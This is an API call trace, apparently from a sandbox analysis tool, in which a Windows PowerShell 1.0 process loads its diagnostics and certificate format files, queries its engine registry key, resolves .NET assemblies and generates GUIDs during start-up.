	[0159.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.295] CoTaskMemFree (pv=0x2b58c0) 
	[0159.987] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0159.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.993] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0159.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.996] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0159.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.998] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0159.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.998] CoTaskMemFree (pv=0x2b58c0) 
	[0160.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.000] SetErrorMode (uMode=0x1) returned 0x1
	[0160.000] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0160.018] GetFileType (hFile=0x1d0) returned 0x1
	[0160.018] SetErrorMode (uMode=0x1) returned 0x1
	[0160.018] GetFileType (hFile=0x1d0) returned 0x1
	[0160.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.040] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.055] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.090] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.110] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.134] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.156] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.185] ReadFile (in: hFile=0x1d0, lpBuffer=0x33dea0a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33dea0a*, lpNumberOfBytesRead=0x1bd2a8*=0x0, lpOverlapped=0x0) returned 1
	[0160.190] ReadFile (in: hFile=0x1d0, lpBuffer=0x33df4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x33df4c0*, lpNumberOfBytesRead=0x1bd2a8*=0x0, lpOverlapped=0x0) returned 1
	[0160.195] CloseHandle (hObject=0x1d0) returned 1
	[0160.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.211] SetErrorMode (uMode=0x1) returned 0x1
	[0160.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1bd250 | out: lpFileInformation=0x1bd250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.375] SetErrorMode (uMode=0x1) returned 0x1
	[0160.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd338 | out: phkResult=0x1bd338*=0x1d0) returned 0x0
	[0160.376] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd2bc, lpData=0x0, lpcbData=0x1bd2b8*=0x0 | out: lpType=0x1bd2bc*=0x1, lpData=0x0, lpcbData=0x1bd2b8*=0x56) returned 0x0
	[0160.376] CoTaskMemAlloc (cb=0x5a) returned 0x2fd5d0
	[0160.376] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd28c, lpData=0x2fd5d0, lpcbData=0x1bd288*=0x56 | out: lpType=0x1bd28c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1bd288*=0x56) returned 0x0
	[0160.376] CoTaskMemFree (pv=0x2fd5d0) 
	[0160.376] RegCloseKey (hKey=0x1d0) returned 0x0
	[0160.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.384] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xc3c7784e, Data2=0x381a, Data3=0x47aa, Data4=([0]=0xa6, [1]=0x60, [2]=0xf7, [3]=0xad, [4]=0xf0, [5]=0xfe, [6]=0xb3, [7]=0x8f))) returned 0x0
	[0160.401] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x936fe81b, Data2=0xe298, Data3=0x486d, Data4=([0]=0xad, [1]=0x80, [2]=0x93, [3]=0x36, [4]=0xb8, [5]=0xb1, [6]=0x25, [7]=0x89))) returned 0x0
	[0165.397] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xec3a58ac, Data2=0x20b3, Data3=0x412f, Data4=([0]=0xbe, [1]=0x13, [2]=0xfe, [3]=0x78, [4]=0xfa, [5]=0x26, [6]=0x5c, [7]=0x29))) returned 0x0
	[0165.403] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xf25b7467, Data2=0xd40c, Data3=0x45ac, Data4=([0]=0xb5, [1]=0xbe, [2]=0x50, [3]=0x45, [4]=0xba, [5]=0x21, [6]=0xd4, [7]=0x3))) returned 0x0
	[0165.405] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x61534cf9, Data2=0x42ab, Data3=0x47db, Data4=([0]=0x81, [1]=0xf9, [2]=0x1b, [3]=0x6f, [4]=0x34, [5]=0x23, [6]=0xe3, [7]=0xd0))) returned 0x0
	[0165.405] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x9b399cf7, Data2=0xda7f, Data3=0x478c, Data4=([0]=0x95, [1]=0x53, [2]=0x3d, [3]=0x60, [4]=0x8d, [5]=0xc9, [6]=0x16, [7]=0x3a))) returned 0x0
	[0165.406] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x7a265680, Data2=0x6708, Data3=0x47fd, Data4=([0]=0xa5, [1]=0xa3, [2]=0xfc, [3]=0x6b, [4]=0x38, [5]=0x5c, [6]=0xe8, [7]=0x5f))) returned 0x0
	[0165.407] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xfcdad08c, Data2=0x5816, Data3=0x47d3, Data4=([0]=0x97, [1]=0x4d, [2]=0x54, [3]=0x69, [4]=0x54, [5]=0xc4, [6]=0x38, [7]=0xe2))) returned 0x0
	[0165.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0165.408] SetErrorMode (uMode=0x1) returned 0x1
	[0165.408] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0165.408] GetFileType (hFile=0x1d0) returned 0x1
	[0165.408] SetErrorMode (uMode=0x1) returned 0x1
	[0165.408] GetFileType (hFile=0x1d0) returned 0x1
	[0165.408] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.409] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.410] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.410] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.411] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.412] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x1000, lpOverlapped=0x0) returned 1
	[0165.412] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0xaca, lpOverlapped=0x0) returned 1
	[0165.412] ReadFile (in: hFile=0x1d0, lpBuffer=0x34553ba, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x34553ba*, lpNumberOfBytesRead=0x1bd2a8*=0x0, lpOverlapped=0x0) returned 1
	[0165.412] ReadFile (in: hFile=0x1d0, lpBuffer=0x3455d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd2a8, lpOverlapped=0x0 | out: lpBuffer=0x3455d88*, lpNumberOfBytesRead=0x1bd2a8*=0x0, lpOverlapped=0x0) returned 1
	[0165.412] CloseHandle (hObject=0x1d0) returned 1
	[0165.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0165.412] SetErrorMode (uMode=0x1) returned 0x1
	[0165.412] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1bd250 | out: lpFileInformation=0x1bd250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0165.412] SetErrorMode (uMode=0x1) returned 0x1
	[0165.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0165.413] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd338 | out: phkResult=0x1bd338*=0x1d0) returned 0x0
	[0165.413] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd2bc, lpData=0x0, lpcbData=0x1bd2b8*=0x0 | out: lpType=0x1bd2bc*=0x1, lpData=0x0, lpcbData=0x1bd2b8*=0x56) returned 0x0
	[0165.413] CoTaskMemAlloc (cb=0x5a) returned 0x2fd560
	[0165.413] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd28c, lpData=0x2fd560, lpcbData=0x1bd288*=0x56 | out: lpType=0x1bd28c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1bd288*=0x56) returned 0x0
	[0165.413] CoTaskMemFree (pv=0x2fd560) 
	[0165.413] RegCloseKey (hKey=0x1d0) returned 0x0
	[0165.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0165.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1bce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0165.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0165.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0165.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0165.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0174.798] VirtualQuery (in: lpAddress=0x1bbdd0, lpBuffer=0x1bcc90, dwLength=0x30 | out: lpBuffer=0x1bcc90*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.799] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xf8026507, Data2=0xf94b, Data3=0x496e, Data4=([0]=0x85, [1]=0xa, [2]=0xe0, [3]=0x23, [4]=0xc7, [5]=0x2e, [6]=0x75, [7]=0xd8))) returned 0x0
	[0174.800] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x70bd98fc, Data2=0x97bb, Data3=0x452f, Data4=([0]=0xa8, [1]=0x9a, [2]=0xfd, [3]=0xbc, [4]=0xa6, [5]=0x72, [6]=0x62, [7]=0xf5))) returned 0x0
	[0174.801] VirtualQuery (in: lpAddress=0x1bbf80, lpBuffer=0x1bce40, dwLength=0x30 | out: lpBuffer=0x1bce40*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.802] VirtualQuery (in: lpAddress=0x1bbf80, lpBuffer=0x1bce40, dwLength=0x30 | out: lpBuffer=0x1bce40*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.803] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xfc7cf080, Data2=0xc09d, Data3=0x465b, Data4=([0]=0x90, [1]=0xf8, [2]=0x0, [3]=0xdc, [4]=0xb1, [5]=0x6a, [6]=0xa0, [7]=0x5e))) returned 0x0
	[0174.805] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x80446e44, Data2=0x9d4f, Data3=0x4ec7, Data4=([0]=0x8c, [1]=0x4c, [2]=0xd4, [3]=0x19, [4]=0x77, [5]=0xa7, [6]=0x17, [7]=0x93))) returned 0x0
	[0174.806] VirtualQuery (in: lpAddress=0x1bc1d0, lpBuffer=0x1bd090, dwLength=0x30 | out: lpBuffer=0x1bd090*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.809] VirtualQuery (in: lpAddress=0x1bb840, lpBuffer=0x1bc700, dwLength=0x30 | out: lpBuffer=0x1bc700*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0175.425] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xc7084bf1, Data2=0xffd2, Data3=0x406c, Data4=([0]=0xa7, [1]=0x41, [2]=0x4c, [3]=0xe, [4]=0x68, [5]=0x1d, [6]=0xba, [7]=0x84))) returned 0x0
	[0175.425] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x90ae1ca1, Data2=0x188a, Data3=0x42c7, Data4=([0]=0xad, [1]=0x3b, [2]=0x73, [3]=0xc4, [4]=0x74, [5]=0xc, [6]=0x1f, [7]=0x61))) returned 0x0
	[0175.426] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xdfd72ea9, Data2=0x8609, Data3=0x4b27, Data4=([0]=0xbd, [1]=0x82, [2]=0x32, [3]=0x6e, [4]=0xdf, [5]=0x5a, [6]=0xa9, [7]=0xbc))) returned 0x0
	[0175.426] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x6c689056, Data2=0xa323, Data3=0x4b26, Data4=([0]=0xa0, [1]=0xdb, [2]=0x19, [3]=0x62, [4]=0x45, [5]=0x21, [6]=0x18, [7]=0xf0))) returned 0x0
	[0175.427] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x20339878, Data2=0x24f5, Data3=0x47a5, Data4=([0]=0x8a, [1]=0xb4, [2]=0x95, [3]=0x72, [4]=0x66, [5]=0x3, [6]=0xea, [7]=0x2b))) returned 0x0
	[0175.427] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0x173deeb6, Data2=0x46c6, Data3=0x4b75, Data4=([0]=0xac, [1]=0xc3, [2]=0xc0, [3]=0xf8, [4]=0xad, [5]=0xa7, [6]=0x6a, [7]=0x62))) returned 0x0
	[0175.428] VirtualQuery (in: lpAddress=0x1bbf10, lpBuffer=0x1bcdd0, dwLength=0x30 | out: lpBuffer=0x1bcdd0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0175.428] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xe1a4168d, Data2=0xf235, Data3=0x42c3, Data4=([0]=0xbf, [1]=0xd2, [2]=0x38, [3]=0x45, [4]=0x7f, [5]=0x16, [6]=0x4c, [7]=0x28))) returned 0x0
	[0175.429] VirtualQuery (in: lpAddress=0x1bbf10, lpBuffer=0x1bcdd0, dwLength=0x30 | out: lpBuffer=0x1bcdd0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0175.430] VirtualQuery (in: lpAddress=0x1bbf10, lpBuffer=0x1bcdd0, dwLength=0x30 | out: lpBuffer=0x1bcdd0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0185.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.021] CoCreateGuid (in: pguid=0x1bd560 | out: pguid=0x1bd560*(Data1=0xe905ee8f, Data2=0x53a6, Data3=0x4623, Data4=([0]=0xbe, [1]=0x19, [2]=0x41, [3]=0x92, [4]=0x2d, [5]=0xdd, [6]=0x53, [7]=0x63))) returned 0x0
	[0185.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
